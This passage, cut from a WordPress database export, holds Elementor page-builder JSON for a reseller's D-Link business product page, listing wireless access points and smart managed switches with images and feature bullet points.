]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7283,3369,'_elementor_version','2.5.14'),(7284,3369,'_elementor_edit_mode','builder'),(7287,3370,'_wp_page_template','template-fullwidth.php'),(7288,3370,'_elementor_template_type','post'),(7289,3370,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"81\",\"right\":\"81\",\"bottom\":\"81\",\"left\":\"81\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, 